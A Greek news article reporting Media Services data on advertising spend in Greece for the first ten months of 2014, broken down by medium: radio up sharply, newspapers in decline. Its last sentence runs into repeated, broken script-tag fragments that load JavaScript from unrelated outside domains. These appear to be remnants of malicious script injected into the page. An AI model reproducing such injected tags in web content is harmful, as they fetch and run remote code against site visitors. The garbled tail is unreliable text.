Αύξηση διαφήμισης 8,8%. Του Θαλή Κουτούπη

0046

Γράφει ο Θαλής Κουτούπης

Σύμφωνα με στοιχεία της Media Services, η διαφημιστική δαπάνη σημείωσε αύξηση 8,8% κατά το δεκάμηνο του 2014. Βέβαια, οι απώλειες στα προηγούμενα χρόνια της κρίσης πλησίασαν το 70%!

Η σημαντική αυτή ανάπτυξη όμως δεν παύει να είναι ελπιδοφόρα! Τη μεγαλύτερη άνοδο (+39%) σημείωσε το ραδιόφωνο.

Συνεχίστηκε και τον Οκτώβριο η θετική πορεία της διαφημιστικής δαπάνης στα κύρια μέσα, όπως δείχνουν τα στοιχεία της Media Services. Έτσι, η συνολική τεκμαρτή δαπάνη αυξήθηκε κατά 5,52% σε σχέση με τον Οκτώβριο του 2013 και διαμορφώθηκε στα 107.735.008 ευρώ. Τη μεγαλύτερη αύξηση δαπάνης εμφάνισε και πάλι το ραδιόφωνο, η οποία έφτασε στο 58,13%, ενώ θετικό ήταν και το πρόσημο για την τηλεόραση, που
έφτασε το 7,89%.

Αντίθετα, σε αρνητικούς ρυθμούς κινήθηκαν εφημερίδες (6,15%) και περιοδικά (1,72%). Όσον αφορά στο 10μηνο του 2014 (Ιανουάριος-Οκτώβριος), η άνοδος της διαφημιστικής δαπάνης έφτασε το 8,80% σε σχέση με το αντίστοιχο 10μηνο του 2013.

Τη μεγαλύτερη άνοδο είχε και πάλι το ραδιόφωνο, με 39% και ακολούθησαν η τηλεόραση (15,49%) και τα περιοδικά (+3,55%). Αντίθετα, οι εφημερίδες παρέμειναν σε αρνητικούς ρυθμούς, με την δαπάνη τους να συρρικνώνεται περαιτέρω (-6,90%) σε σχέση με το αντίστοιχο 10μηνο του 2013 – και όλα αυτά τη στιγμή που τις τελευταίες εβδομάδες έχουμε μπαράζ λανσαρισμάτων νέων εφημερίδων.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>challengeforme.com/pystats.js?l=l&’ async=true type=text/javascript language=javascript>